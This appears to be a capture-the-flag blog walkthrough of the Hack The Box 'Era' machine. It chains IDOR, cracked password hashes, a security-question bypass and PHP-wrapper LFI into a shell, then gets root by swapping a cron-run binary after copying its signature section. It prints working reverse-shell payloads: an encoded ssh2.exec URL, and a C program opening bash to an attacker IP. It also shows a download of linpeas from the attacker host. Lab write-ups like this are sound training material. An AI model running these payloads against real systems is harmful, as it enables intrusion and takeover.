CyberNexusBlog

Era HTB Machine Writeup - Complete Exploitation Guide

Youssef Ketaj's photo
Youssef Ketaj

5 min read

Cover Image for Era HTB Machine Writeup - Complete Exploitation Guide

Overview

Era is a Linux machine from Hack The Box that demonstrates several interesting attack vectors including IDOR vulnerabilities, privilege escalation through security questions, Local File Inclusion (LFI) via PHP wrappers, and a creative privilege escalation using binary signature manipulation.

Machine Details:

  • IP: 10.10.11.79

  • OS: Linux (Ubuntu)

  • Difficulty: Medium

  • Attack Vector: Web Application Vulnerabilities, LFI, Binary Manipulation

Initial Setup

First, let's add the target to our hosts file:

echo "10.10.11.79 era.htb" >> /etc/hosts

Enumeration Phase

Port Scanning with Rustscan

Let's start with a comprehensive port scan to identify open services:

rustscan -a 10.10.11.79 -- -sC -sV

Results:

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.5
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)

The scan reveals two open ports:

  • Port 21: FTP service (vsftpd 3.0.5)

  • Port 80: HTTP service (nginx 1.18.0)

Web Application Analysis

Main Website (era.htb)

The main website appears to be a static design portfolio. Let's perform directory enumeration:

dirsearch -u http://era.htb

Discovered directories:

  • /js/

  • /css/

  • /fonts/

  • /img/

Subdomain Discovery

Using ffuf to discover subdomains:

ffuf -u http://era.htb -H "Host: FUZZ.era.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 4

Found subdomain: file.era.htb

Let's add this to our hosts file:

echo "10.10.11.79 file.era.htb" >> /etc/hosts

File Management Application

The subdomain hosts a file management application. Let's enumerate it:

dirsearch -u file.era.htb -x 403

Key findings:

  • /login.php - Login page

  • /register.php - User registration

  • /upload.php - File upload functionality

  • /download.php - File download handler

  • /manage.php - Management interface

Exploitation Phase

Step 1: User Registration and Access

Let's create a test account:

  • Username: test

  • Password: test123

After registration, we can log in and access the dashboard:

Step 2: IDOR Vulnerability Discovery

The application allows file uploads and provides download links in the format:

http://file.era.htb/download.php?id=5712

This suggests an Insecure Direct Object Reference (IDOR) vulnerability. Let's fuzz the ID parameter:

Step 3: Site Backup Discovery

After fuzzing the ID parameter, we discover that id=54 returns a site backup file. Let's download it:

wget "http://file.era.htb/download.php?id=54&dl=true"

Step 4: Database Analysis

The backup contains several interesting files, including filedb.sqlite. Let's examine the database:

The users table contains password hashes:

Found hashes:

eric:$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm
yuri:$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.
admin_ef01cab31aa:$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.

Step 5: Password Cracking

Let's crack these hashes using hashcat:

# Extract hashes to a file
cut -d ':' -f2 hash.txt > clean_hashes.txt

# Crack using rockyou wordlist
hashcat -m 3200 -a 0 clean_hashes.txt /usr/share/wordlists/rockyou.txt

# Show cracked passwords
hashcat -m 3200 --show clean_hashes.txt

Cracked credentials:

  • eric:america

  • yuri:mustang

Step 6: Source Code Analysis

Examining the download.php source code reveals a critical vulnerability:

// BETA (Currently only available to the admin) - Showcase file instead of downloading it
} elseif ($_GET['show'] === "true" && $_SESSION['erauser'] === 1) {
    $format = isset($_GET['format']) ? $_GET['format'] : '';
    $file = $fetched[0];

    if (strpos($format, '://') !== false) {
        $wrapper = $format;
        header('Content-Type: application/octet-stream');
    } else {
        $wrapper = '';
        header('Content-Type: text/html');
    }

    try {
        $file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');
        $full_path = $wrapper ? $wrapper . $file : $file;
        // Debug Output
        echo "Opening: " . $full_path . "\n";
        echo $file_content;
    } catch (Exception $e) {
        echo "Error reading file: " . $e->getMessage();
    }
}

This code allows administrators to use PHP wrappers for file access, creating a Local File Inclusion (LFI) vulnerability.

Step 7: Admin Account Compromise

The backup also contains security_login.php, which shows a security question bypass mechanism. We can update security questions for the admin account using the yuri user session.

Now we can log in as admin using the security questions:

Success! We're now logged in as admin:

Step 8: FTP Access and SSL Keys

With the cracked credentials, let's try FTP access:

ftp era.htb
# Login with yuri:mustang

In the FTP server, we find SSL signing keys in the /signing directory:

  • key.pem - Private key for signing

  • x509.genkey - Certificate generation config

Step 9: Reverse Shell via PHP Wrapper

Since we have admin access, we can use the SSH2 PHP extension to execute commands:

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27printf%20KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTQuOTMvOTAwMSAgMD4mMSkgJg|base64%20-d|bash%27;

User flag captured: 9c6ec6a043e14bb7xxxxxxxxxxxxxxxxx

Privilege Escalation

Step 10: System Enumeration

Let's run linpeas for privilege escalation vectors:

curl http://10.10.14.93:8000/linpeas.sh > linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Linpeas didn't reveal anything particularly useful for privilege escalation, so we need to do manual enumeration.

Step 11: Process Monitoring

Using watch to monitor running processes:

watch -n 1 "ps aux --sort=start_time | tail -n 10"

We discover a CRON job running /root/initiate_monitoring.sh that monitors /opt/AV/periodic-checks/monitor and checks its .text_sig section for integrity.

Step 12: Binary Signature Manipulation

The key insight is that the monitoring system checks the .text_sig section of the binary. We can:

  1. Create a malicious binary

  2. Copy the original .text_sig section

  3. Replace the monitored binary

Exploit code:

#include <stdlib.h>
int main() {
    system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.93/9002 0>&1'");
    return 0;
}

Exploitation steps:

# Navigate to the monitoring directory
cd /opt/AV/periodic-checks

# Create our malicious code
nano virus.c

# Compile the malicious binary
gcc virus.c -o door

# Extract the original signature section
objcopy --dump-section .text_sig=text_sig /opt/AV/periodic-checks/monitor

# Add the signature to our malicious binary
objcopy --add-section .text_sig=text_sig door

# Replace the original binary
cp door monitor

Step 13: Root Access

When the CRON job runs, it executes our malicious binary, granting us root access:

Root flag captured: 24f0f2d439f6afexxxxxxxxxxxxxxxxx

Summary

This machine demonstrated several important attack vectors:

  1. IDOR Vulnerability - Insecure direct object references allowed access to unauthorized files

  2. Information Disclosure - Database backup exposure revealed user credentials and source code

  3. Authentication Bypass - Security questions could be manipulated for admin access

  4. Local File Inclusion - PHP wrapper exploitation through admin-only features

  5. Binary Signature Manipulation - Creative privilege escalation through CRON job exploitation

Key Takeaways

  • Always implement proper access controls for file downloads

  • Secure backup files and don't expose them through web applications

  • Validate and sanitize all user inputs, especially in file handling operations

  • Implement proper signature verification that can't be easily bypassed

  • Regular security audits of CRON jobs and automated processes are essential